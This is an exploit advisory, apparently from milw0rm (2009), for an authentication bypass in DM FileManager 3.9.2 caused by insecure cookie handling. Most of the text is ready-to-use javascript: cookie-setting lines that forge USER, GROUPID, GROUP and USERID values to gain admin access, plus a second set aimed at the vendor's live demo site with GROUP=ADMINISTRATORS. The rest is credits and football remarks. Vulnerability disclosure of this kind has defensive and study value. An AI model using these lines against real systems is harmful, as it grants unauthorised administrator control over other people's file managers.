DM FileManager 3.9.2 Insecure Cookie Handling Vuln Founder: ThE g0bL!N ------ Home: http:/www.4ckx.com/dz/ ---- Vendor:http://dutchmonkey.com Special Thx: Snakespc Note: Algerie 3-1 Egypt Exploit: ------ javascript:document.cookie="USER=[user name ];path=/"; javascript:document.cookie="GROUPID=1;path=/"; javascript:document.cookie="GROUP=[Groupe of user];path=/"; javascript:document.cookie="USERID=[user_id];path=path=/"; Then Go to Url /admin.php Demo: ---- http://dutchmonkey.com/products/dm-filemanager/demo/admin/login.php Exp for demo: ------------ javascript:document.cookie="USER=GUEST;path=/products/dm-filemanager/demo/admin/"; javascript:document.cookie="GROUPID=1;path=/products/dm-filemanager/demo/admin/"; javascript:document.cookie="GROUP=ADMINISTRATORS;path=/products/dm-filemanager/demo/admin/"; javascript:document.cookie="USERID=51;path=/products/dm-filemanager/demo/admin/"; Note: ALgerie en Coupe Du Monde In shaa ALLAH ################################################################################################ # milw0rm.com [2009-06-08]